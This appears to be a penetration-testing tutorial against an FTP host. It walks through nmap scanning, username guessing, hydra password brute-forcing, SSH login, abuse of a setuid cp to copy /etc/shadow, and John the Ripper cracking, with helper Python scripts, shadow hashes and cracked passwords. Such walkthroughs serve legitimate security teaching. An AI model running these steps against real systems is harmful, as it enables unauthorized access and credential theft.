We first run a quick nmap scan against the remote host ftp.acme.com and try to fingerprint the FTP service it is running.
root@asus:~% nmap -sV -T4 ftp.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-02 20:18 MDT
Nmap scan report for ftp.acme.com (ftp.acme.com)
Host is up (0.000073s latency).
Not shown: 988 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.88 seconds
root@asus:~%
We see the remote host is indeed serving FTP. Let's now connect to the FTP server with the telnet program and issue a command by hand; the 220 banner on its own confirms the vsftpd version nmap reported.
root@asus:~% telnet ftp.acme.com 21
Trying ftp.acme.com...
Connected to ftp.acme.com.
Escape character is '^]'.
220 (vsFTPd 3.0.3)
quit
221 Goodbye.
Connection closed by foreign host.
root@asus:~%
Our next step is to see if the FTP server allows anonymous logins.
sam@asus:~% ftp
ftp> open ftp.acme.com
Connected to ftp.acme.com.
220 (vsFTPd 3.0.3)
Name (ftp.acme.com:sam): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
We can connect anonymously, but the directory is empty. Our next test is whether we can upload files to the server anonymously.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
553 Could not create file.
ftp>
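The two manual checks above (anonymous login, then an upload attempt) are what you would script when there is more than one FTP host to look at. The following is an added example of my own, not code from the original write-up: it uses Python's standard ftplib to do the same probe, cleans up after itself if the upload does succeed, and keeps the reply-code interpretation in a separate function so the "553 Could not create file." case seen above is reported as a permission problem rather than a crash. The host name is taken from the command line; the probe file name is my own choice.

```python
import io
import re
import ftplib

# A plain-reply classifier: FTP replies start with a 3-digit code (RFC 959).
# 230/530 are the login outcomes, 550/553 the "you may not do that" replies
# vsftpd gives for a forbidden STOR, such as the 553 seen above.
def reply_code(message):
    """The 3-digit code at the start of an FTP reply, or None if absent."""
    m = re.match(r"(\d{3})", message)
    return int(m.group(1)) if m else None


def outcome(message):
    code = reply_code(message)
    if code is None:
        return "unparseable"
    if code == 230:
        return "login_ok"
    if code == 530:
        return "login_denied"
    if code in (550, 553):
        return "permission_denied"
    if 200 <= code < 300:
        return "ok"
    if 400 <= code < 500:
        return "transient_error"
    return "error"


def probe_anonymous_ftp(host, port=21, timeout=10, probe_name="ftp-probe.txt"):
    """Try an anonymous login, list the root directory and attempt one upload.

    Returns a dict; 'writable' is None when we never got as far as trying.
    The probe file is deleted again if the upload went through.
    """
    result = {"host": host, "banner": None, "anonymous": False,
              "listing": [], "writable": None, "detail": None}
    ftp = ftplib.FTP()
    try:
        result["banner"] = ftp.connect(host, port, timeout=timeout)
        ftp.set_pasv(True)  # passive mode, as the server itself suggests above
        ftp.login("anonymous", "anonymous@example.com")
        result["anonymous"] = True
        try:
            result["listing"] = ftp.nlst()
        except ftplib.error_perm:
            # Some servers answer NLST on an empty directory with a 550.
            result["listing"] = []
        try:
            ftp.storbinary("STOR " + probe_name,
                           io.BytesIO(b"anonymous write probe\n"))
            result["writable"] = True
            try:
                ftp.delete(probe_name)
            except ftplib.error_perm:
                pass  # could write but not delete; leave it and report
        except ftplib.error_perm as exc:
            result["writable"] = False
            result["detail"] = outcome(str(exc))
        ftp.quit()
    except ftplib.error_perm as exc:
        # Most commonly "530 Login incorrect." when anonymous is disabled.
        result["detail"] = outcome(str(exc))
    except (OSError, EOFError) as exc:
        result["detail"] = "connect_failed: %s" % exc
    finally:
        ftp.close()
    return result


if __name__ == "__main__":
    import sys
    print(probe_anonymous_ftp(sys.argv[1] if len(sys.argv) > 1 else "ftp.acme.com"))
```

Run it as `python3 probe.py ftp.acme.com`; against the server above it reports `anonymous: True`, an empty listing and `writable: False` with `detail: permission_denied`.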
No luck here: the anonymous user cannot write to the directory. One thing we can do is take names from the company's website and use them to fuzz for possible FTP users on the server.
FTP User Enumeration
We have some names from the company website which we will use to fuzz for valid usernames on the FTP server. We can use our username script from Enumerating UNIX Usernames to generate a list of possible usernames from the names we got from the website.
clare johnson
vance patel
hayden smith
sasha reed
jared wilson
sam@asus:~/pentest_notes% perl username-fuzz.pl hayden smith
hayden
smith
haysmith
smithhay
s.hayden
s_hayden
s-hayden
smihayden
hayden.smith
hayden_smith
hayden-smith
h.smith
h_smith
h-smith
smith.ha
smith_ha
smith-ha
haydensm
smhayden
...
Once we have a list of possible usernames we can move on to using hydra to find out the username format. All we need is one user to test with; after that we can apply the same username rule to the remaining names on the list.
For our payloads we will use the list of candidate username formats as the user list and the rockyou wordlist for the passwords. With some luck we should find a valid user/password combination with Hydra. Be aware that this is noisy: every attempt is a failed login in the server's log, and any lockout or fail2ban-style rule on the target will cut the run short.
sam@asus:~% hydra -L haydensmith.txt -P rockyou.txt ftp://ftp.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.acme.com   login: hayden   password: ashley
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31
sam@asus:~%
We found a valid user/password combination, and with it the username format for the remote FTP server: first name only. Now we construct a new list of usernames using that format and repeat the process for the other users.
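The username-fuzz.pl script used above is not reproduced on this page, so the Python below is my own added example of the same idea, not the author's script. It generates a candidate list for one person in the shapes seen in the output above, works out which pattern produced the login hydra confirmed, and then applies that single pattern to the rest of the names so the second hydra run only carries one login per person. The pattern names are my own labels; the list of people is the one from the company website above.

```python
import re

# Username shapes to try. Keys are labels of my own choosing; each rule takes
# the normalised (first, last) pair and returns one candidate. The set mirrors
# the shapes in the username-fuzz.pl output above (haysmith, s.hayden, ...).
PATTERNS = {
    "first":      lambda f, l: f,
    "last":       lambda f, l: l,
    "fir3last":   lambda f, l: f[:3] + l,        # haysmith
    "lastfir3":   lambda f, l: l + f[:3],        # smithhay
    "l.first":    lambda f, l: l[0] + "." + f,   # s.hayden
    "l_first":    lambda f, l: l[0] + "_" + f,
    "l-first":    lambda f, l: l[0] + "-" + f,
    "las3first":  lambda f, l: l[:3] + f,        # smihayden
    "first.last": lambda f, l: f + "." + l,
    "first_last": lambda f, l: f + "_" + l,
    "first-last": lambda f, l: f + "-" + l,
    "f.last":     lambda f, l: f[0] + "." + l,   # h.smith
    "f_last":     lambda f, l: f[0] + "_" + l,
    "f-last":     lambda f, l: f[0] + "-" + l,
    "last.fi2":   lambda f, l: l + "." + f[:2],  # smith.ha
    "last_fi2":   lambda f, l: l + "_" + f[:2],
    "last-fi2":   lambda f, l: l + "-" + f[:2],
    "firstla2":   lambda f, l: f + l[:2],        # haydensm
    "la2first":   lambda f, l: l[:2] + f,        # smhayden
    "flast":      lambda f, l: f[0] + l,
    "firstl":     lambda f, l: f + l[0],
    "firstlast":  lambda f, l: f + l,
    "lastfirst":  lambda f, l: l + f,
}

# The five names from the company website, as listed above.
PEOPLE = [("clare", "johnson"), ("vance", "patel"), ("hayden", "smith"),
          ("sasha", "reed"), ("jared", "wilson")]


def normalize(part):
    """Lower-case and drop anything outside a-z0-9 (O'Brien -> obrien)."""
    return re.sub(r"[^a-z0-9]", "", part.lower())


def candidates(first, last):
    """All distinct candidates for one person, in PATTERNS order, for hydra -L."""
    f, l = normalize(first), normalize(last)
    if not f or not l:
        raise ValueError("need both a first and a last name")
    out = []
    for rule in PATTERNS.values():
        c = rule(f, l)
        if c not in out:      # short names make some patterns collide
            out.append(c)
    return out


def detect_patterns(first, last, confirmed):
    """Which pattern(s) turn this person's name into the login hydra confirmed."""
    f, l = normalize(first), normalize(last)
    return [name for name, rule in PATTERNS.items() if rule(f, l) == confirmed]


def apply_pattern(pattern, people):
    """Apply one confirmed pattern to every (first, last) pair."""
    rule = PATTERNS[pattern]
    return [rule(normalize(f), normalize(l)) for f, l in people]


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:                       # stage 1: one person's candidates
        print("\n".join(candidates(sys.argv[1], sys.argv[2])))
    else:                                        # stage 2: hydra confirmed "hayden"
        pattern = detect_patterns("hayden", "smith", "hayden")[0]
        print("\n".join(apply_pattern(pattern, PEOPLE)))
```

`python3 usergen.py hayden smith > haydensmith.txt` gives the stage-one list; with no arguments it prints the five first names that make up users.txt below.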
Finding Valid FTP Accounts
Our users.txt should look like so:
clare
vance
hayden
sasha
jared
sam@asus:~% hydra -L users.txt -P rockyou.txt ftp://ftp.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.acme.com   login: jared   password: qwerty
[21][ftp] host: ftp.acme.com   login: vance   password: 654321
[21][ftp] host: ftp.acme.com   login: clare   password: jessica
[21][ftp] host: ftp.acme.com   login: sasha   password: michael
[21][ftp] host: ftp.acme.com   login: hayden   password: ashley
1 of 1 target successfully completed, 5 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31
sam@asus:~%
We successfully found credentials for all the usernames in the list.
Browsing FTP directories
sam@asus:~% ftp
ftp> open 148.32.42.5
Connected to 148.32.42.5.
220 (vsFTPd 3.0.3)
Name (148.32.42.5:sam): hayden
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    4 65534    65534        4096 May 15 07:49 ftp
-rw-rw-r--    1 1005     1005        48605 Sep 12 17:38 home.tar.gz
drwx------    2 1005     1005         4096 May 01 09:44 mail
-rwxr--r--    1 1005     1005          594 Sep 02 14:54 server.pl
226 Directory send OK.
ftp> get home.tar.gz
local: home.tar.gz remote: home.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for home.tar.gz (48605 bytes).
226 Transfer complete.
48605 bytes received in 0.00 secs (9.9986 MB/s)
ftp> exit
221 Goodbye.
sam@asus:~%
We check the bash history file for interesting finds.
Trying to login to SSH
We can try to log in over SSH with the credentials we found to see if we get lucky.
sam@asus:~% ssh -l clare 148.32.42.5
clare@148.32.42.5's password:
Welcome to GalliumOS 2.1 (GNU/Linux 4.9.4-galliumos-braswell x86_64)

 * Documentation:  https://wiki.galliumos.org/
 * Support:        https://reddit.com/r/GalliumOS

Last login: Tue Sep  3 13:40:25 2019 from 148.32.42.5
clare@asus:~$ sudo -l
[sudo] password for clare:
Sorry, user clare may not run sudo on asus.
clare@asus:~$
As we can see, the user clare is not allowed to run sudo. Our next step is to check for SUID binaries to see if we can execute commands as a higher-privileged user such as root.
clare@asus:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/virtualbox/VBoxHeadless
/usr/lib/virtualbox/VBoxNetDHCP
/usr/lib/virtualbox/VBoxNetAdpCtl
/usr/lib/virtualbox/VBoxSDL
/usr/lib/virtualbox/VirtualBox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/galliumos-update/update_package_index
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/chromium-browser/chrome-sandbox
/usr/bin/perl5.22.1
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/tcptraceroute.mt
/usr/bin/perl
/usr/bin/sudo
/usr/bin/gawk
/usr/bin/pkexec
/usr/sbin/pppd
/home/sam/unix/prog
/bin/ping6
/bin/su
/bin/ping
/bin/fusermount
/bin/mount
/bin/cp
/bin/umount
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
clare@asus:~$
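A listing like the one above is long enough that it pays to triage it rather than eyeball it. The Python below is an added example of mine, not part of the original write-up: it sorts setuid paths into binaries that hand out root outright (shells, interpreters, file copiers), files outside the normal system directories, and everything else that is not on a baseline of what ships setuid on Debian/Ubuntu-derived systems. Both the "abusable" shortlist and the baseline are my own and deliberately small; compare against a clean install of the same release before trusting the "review" bucket. `find_setuid` is a live equivalent of the find command above, for use when you have a shell but no find.

```python
import os
import posixpath
import re
import stat

# Binaries that give root directly when setuid root: they can spawn a shell
# or read/write arbitrary files. My own shortlist, not exhaustive.
ABUSABLE = {
    "bash", "sh", "dash", "zsh", "perl", "python", "ruby", "gawk", "awk", "mawk",
    "cp", "mv", "dd", "tee", "find", "vim", "vi", "nano", "less", "more", "tar",
    "env", "nmap", "socat", "nc", "netcat", "xargs", "rsync",
}

# Setuid-root files that are expected on stock Debian/Ubuntu-derived systems
# (my own baseline; verify against a clean install of the same release).
EXPECTED = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chfn",
    "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/sbin/mount.nfs", "/sbin/mount.ecryptfs_private", "/usr/sbin/pppd",
}

SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/",
                   "/usr/libexec/")

# The find output shown above (page data, not constructed).
SAMPLE = """
/usr/lib/eject/dmcrypt-get-device
/usr/lib/virtualbox/VBoxHeadless
/usr/lib/virtualbox/VBoxNetDHCP
/usr/lib/virtualbox/VBoxNetAdpCtl
/usr/lib/virtualbox/VBoxSDL
/usr/lib/virtualbox/VirtualBox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/galliumos-update/update_package_index
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/chromium-browser/chrome-sandbox
/usr/bin/perl5.22.1
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/tcptraceroute.mt
/usr/bin/perl
/usr/bin/sudo
/usr/bin/gawk
/usr/bin/pkexec
/usr/sbin/pppd
/home/sam/unix/prog
/bin/ping6
/bin/su
/bin/ping
/bin/fusermount
/bin/mount
/bin/cp
/bin/umount
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
"""


def stem(path):
    """Basename with a trailing version stripped: perl5.22.1 -> perl, ping6 -> ping."""
    return re.sub(r"[0-9.]+$", "", posixpath.basename(path))


def triage(paths):
    """Bucket setuid paths: abusable / unusual_location / review (not on baseline)."""
    result = {"abusable": [], "unusual_location": [], "review": []}
    for p in paths:
        p = p.strip()
        if not p:
            continue
        if stem(p) in ABUSABLE:
            result["abusable"].append(p)
        elif not p.startswith(SYSTEM_PREFIXES):
            result["unusual_location"].append(p)
        elif p not in EXPECTED:
            result["review"].append(p)
    return result


def find_setuid(root="/"):
    """Live equivalent of `find / -perm -u=s -type f`, ignoring unreadable dirs."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)        # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return hits


if __name__ == "__main__":
    for bucket, paths in triage(SAMPLE.splitlines()).items():
        print(bucket, *paths, sep="\n  ")
```

On the listing above this puts /bin/cp, /usr/bin/perl, /usr/bin/perl5.22.1 and /usr/bin/gawk in the abusable bucket and /home/sam/unix/prog in unusual_location; the VirtualBox helpers, chrome-sandbox, tcptraceroute.mt and update_package_index land in review.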
We see that cp is setuid root. All we need to do is cp /etc/shadow to a file in our home directory and crack the hashes with John the Ripper. The copy ends up owned by root but with clare's group (cp runs with a root effective uid and our own gid), so it is readable by us without any further tricks. Note that a setuid-root cp can write files as root as well as read them, so it gives far more than we use here, and the same listing shows /usr/bin/perl and /usr/bin/gawk setuid too, neither of which is setuid on a stock install; cp is simply the easiest of the three to use for what we want.
clare@asus:~$ cp /etc/shadow .shadow
clare@asus:~$ ls -l .shadow
-rw-r----- 1 root clare 2199 Sep 12 20:19 .shadow
clare@asus:~$ cat .shadow
root:!:17866:0:99999:7:::
daemon:*:17200:0:99999:7:::
bin:*:17200:0:99999:7:::
sys:*:17200:0:99999:7:::
sync:*:17200:0:99999:7:::
games:*:17200:0:99999:7:::
man:*:17200:0:99999:7:::
lp:*:17200:0:99999:7:::
mail:*:17200:0:99999:7:::
news:*:17200:0:99999:7:::
uucp:*:17200:0:99999:7:::
proxy:*:17200:0:99999:7:::
www-data:*:17200:0:99999:7:::
backup:*:17200:0:99999:7:::
list:*:17200:0:99999:7:::
irc:*:17200:0:99999:7:::
gnats:*:17200:0:99999:7:::
nobody:*:17200:0:99999:7:::
systemd-timesync:*:17200:0:99999:7:::
systemd-network:*:17200:0:99999:7:::
systemd-resolve:*:17200:0:99999:7:::
systemd-bus-proxy:*:17200:0:99999:7:::
messagebus:*:17200:0:99999:7:::
syslog:*:17200:0:99999:7:::
_apt:*:17200:0:99999:7:::
ntp:*:17225:0:99999:7:::
avahi-autoipd:*:17225:0:99999:7:::
avahi:*:17225:0:99999:7:::
colord:*:17225:0:99999:7:::
dnsmasq:*:17225:0:99999:7:::
pulse:*:17225:0:99999:7:::
hplip:*:17225:0:99999:7:::
rtkit:*:17225:0:99999:7:::
saned:*:17225:0:99999:7:::
usbmux:*:17225:0:99999:7:::
speech-dispatcher:!:17225:0:99999:7:::
uuidd:*:17225:0:99999:7:::
statd:*:17873:0:99999:7:::
mysql:!:17897:0:99999:7:::
openldap:!:17906:0:99999:7:::
snmp:*:18010:0:99999:7:::
postfix:*:18013:0:99999:7:::
clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.:18013:0:99999:7:::
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.:18013:0:99999:7:::
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60:18013:0:99999:7:::
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.:18013:0:99999:7:::
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0:18013:0:99999:7:::
dovecot:*:18014:0:99999:7:::
dovenull:*:18014:0:99999:7:::
bind:*:18015:0:99999:7:::
ftp:*:18031:0:99999:7:::
sshd:*:18142:0:99999:7:::
clare@asus:~$
Cracking Passwords with John The Ripper
We save the user:hash lines for john to run against, in a file we call john.pot (a confusing name in hindsight, since john also calls its own store of cracked passwords john.pot; any other name works just as well). Only the five $6$ entries matter: a password field of * or ! means the account has no password hash to crack.
clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0
Here we run john with the rockyou wordlist against the users and password hashes in that file.
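Picking the crackable lines out of a shadow file by hand is fine for five users and error-prone for five hundred. The Python below is an added example of mine, not part of the original write-up: it parses shadow-format text, tells locked, disabled and empty password fields apart from real hashes, identifies the crypt(3) algorithm from the prefix, pulls the salt and round count out of a $6$ hash (the "Cost 1 (iteration count) is 5000" john reports below is the default when no rounds= field is present), and writes the user:hash lines john expects. The sample input is a subset of the shadow listing shown above; the helper names are my own.

```python
import re

# crypt(3) prefixes we recognise; everything on this page is $6$ (sha512crypt).
HASH_TYPES = {"$1$": "md5crypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
              "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}

# A subset of the /etc/shadow lines shown above (page data, not constructed).
SAMPLE_SHADOW = """root:!:17866:0:99999:7:::
daemon:*:17200:0:99999:7:::
nobody:*:17200:0:99999:7:::
clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.:18013:0:99999:7:::
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.:18013:0:99999:7:::
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60:18013:0:99999:7:::
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.:18013:0:99999:7:::
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0:18013:0:99999:7:::
ftp:*:18031:0:99999:7:::
sshd:*:18142:0:99999:7:::
"""


def parse_shadow(text):
    """Parse shadow(5) lines into dicts; every line must have 9 colon fields."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError("line %d: expected 9 fields, got %d" % (lineno, len(fields)))
        entries.append({"user": fields[0], "hash": fields[1], "lastchg": fields[2]})
    return entries


def classify_hash(h):
    """Return (status, algorithm); algorithm is None when there is nothing to crack.

    status: 'empty' (no password at all), 'disabled' (* or !, no hash),
            'locked' (real hash behind a leading !), 'active'.
    """
    if h == "":
        return ("empty", None)
    locked = h.startswith("!")
    core = h.lstrip("!")
    if core in ("", "*"):
        return ("disabled", None)
    status = "locked" if locked else "active"
    for prefix, algo in HASH_TYPES.items():
        if core.startswith(prefix):
            return (status, algo)
    if len(core) == 13:                # traditional DES crypt: 2-char salt + 11
        return (status, "descrypt")
    return (status, "unknown")


def sha512crypt_parts(h):
    """(rounds, salt, digest) of a $6$ hash; rounds defaults to 5000."""
    m = re.fullmatch(r"\$6\$(?:rounds=(\d+)\$)?([^$]{1,16})\$([./0-9A-Za-z]+)", h)
    if not m:
        raise ValueError("not a sha512crypt hash")
    return (int(m.group(1)) if m.group(1) else 5000, m.group(2), m.group(3))


def crackable(entries):
    """Entries that carry a real hash (locked accounts included: the hash is still there)."""
    return [e for e in entries if classify_hash(e["hash"])[1] is not None]


def to_john(entries):
    """user:hash lines as john loads them; the lock marker is stripped."""
    return "".join("%s:%s\n" % (e["user"], e["hash"].lstrip("!")) for e in crackable(entries))


if __name__ == "__main__":
    entries = parse_shadow(SAMPLE_SHADOW)
    for e in entries:
        print("%-8s %s" % (e["user"], classify_hash(e["hash"])))
    print(to_john(entries), end="")
```

Write `to_john(parse_shadow(open(".shadow").read()))` to a file and run it through john as above; john recognises the $6$ prefix on its own, so no --format is needed. Anything reported as `empty` deserves a look before you crack a single hash, since it means a blank password.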
root@asus:~/src/john/run% ./john --wordlist=/home/sam/rockyou.txt /home/sam/john.pot
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE4.1 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jessica          (clare)
qwerty           (jared)
654321           (vance)
ashley           (hayden)
michael          (sasha)
5g 0:00:00:03 DONE (2019-09-12 19:26) 1.412g/s 36.15p/s 180.7c/s 180.7C/s 123456..diamond
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run%